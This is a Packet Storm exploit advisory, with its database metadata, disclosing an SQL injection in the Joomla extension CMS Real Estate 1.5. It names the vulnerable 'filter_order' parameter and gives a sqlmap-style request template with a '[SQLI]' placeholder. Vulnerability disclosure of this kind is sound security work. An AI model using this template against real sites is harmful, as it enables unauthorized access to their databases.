ID PACKETSTORM:145697
Type packetstorm
Reporter Bilal Kardadou
Modified 2018-01-06T00:00:00
Description
`################################################
#Title: Joomla! CMS Real Estate 1.5 - SQL injection
#Credit: Bilal KARDADOU
#Vendor: http://www.cms-realestate.com
#URL:
https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/cms-real-estate/
#Product: 'Joomla! CMS Real Estate 1.5 - SQL injection'
#Developer: JoomlaUX
#Extension type: Plugin
#Last updated: Nov 08 2017
#Compatibility: 3.X
#Type: Paid download
#Google Dork: N/A
################################################
#
# Description:
# Real Estate Agency component for Joomla! 3.x versions.
#
#
# --Method=GET -p [filter_order]
#
# -u "
http://127.0.0.1/index.php?option=com_nbreal&view=properties&layout=global&filter_order=[SQLI]&filter_order_Dir=&bigsearch=A+quiet+family+home+with+private+garden+area+in+a+cul-de-sac+near+the+pool+-+Three-bedroom+Villa&n_bedrooms=5&n_bathrooms=8
"
#
# PoC:
# https://prnt.sc/hwdajq
#
#
# Bilal KARDADOU - https://www.linkedin.com/in/kardadou/)
################################################
`
{"sourceData": "`################################################ \n#Title: Joomla! CMS Real Estate 1.5 - SQL injection \n#Credit: Bilal KARDADOU \n#Vendor: http://www.cms-realestate.com \n#URL: \nhttps://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/cms-real-estate/ \n#Product: 'Joomla! CMS Real Estate 1.5 - SQL injection' \n#Developer: JoomlaUX \n#Extension type: Plugin \n#Last updated: Nov 08 2017 \n#Compatibility: 3.X \n#Type: Paid download \n#Google Dork: N/A \n################################################ \n# \n# Description: \n# Real Estate Agency component for Joomla! 3.x versions. \n# \n# \n# --Method=GET -p [filter_order] \n# \n# -u \" \nhttp://127.0.0.1/index.php?option=com_nbreal&view=properties&layout=global&filter_order=[SQLI]&filter_order_Dir=&bigsearch=A+quiet+family+home+with+private+garden+area+in+a+cul-de-sac+near+the+pool+-+Three-bedroom+Villa&n_bedrooms=5&n_bathrooms=8 \n\" \n# \n# PoC: \n# https://prnt.sc/hwdajq \n# \n# \n# Bilal KARDADOU - https://www.linkedin.com/in/kardadou/) \n################################################ \n`\n", "history": [], "description": "", "sourceHref": "https://packetstormsecurity.com/files/download/145697/joomlacmsrealestate15-sql.txt", "reporter": "Bilal Kardadou", "href": "https://packetstormsecurity.com/files/145697/Joomla-CMS-Real-Estate-1.5-SQL-Injection.html", "type": "packetstorm", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "9b9f0f14d31ffd74d619e52da6cd39f7"}, {"key": "modified", "hash": "f5b75daf56220350783b7a34313e09fa"}, {"key": "published", "hash": "f5b75daf56220350783b7a34313e09fa"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "43ffc14cb6936c5ee2132d5e62e4cb60"}, {"key": "sourceData", "hash": "626e594df206af1ba200cf33c8c21a85"}, {"key": "sourceHref", "hash": "002973d860c595c4053e91fff028f4b9"}, {"key": "title", "hash": "d6ab881a93f1a667dfce572eb17a1041"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "viewCount": 12, "references": [], "lastseen": "2018-01-07T00:33:40", "published": "2018-01-06T00:00:00", "objectVersion": "1.3", "cvelist": [], "id": "PACKETSTORM:145697", "hash": "e94b4d3be408e13adba41331c05d61bc646c2b5d22da9024a731cedd5fc6379c", "modified": "2018-01-06T00:00:00", "title": "Joomla CMS Real Estate 1.5 SQL Injection", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "dependencies": {"references": [], "modified": "2018-01-07T00:33:40"}, "vulnersScore": 7.5}}
{}
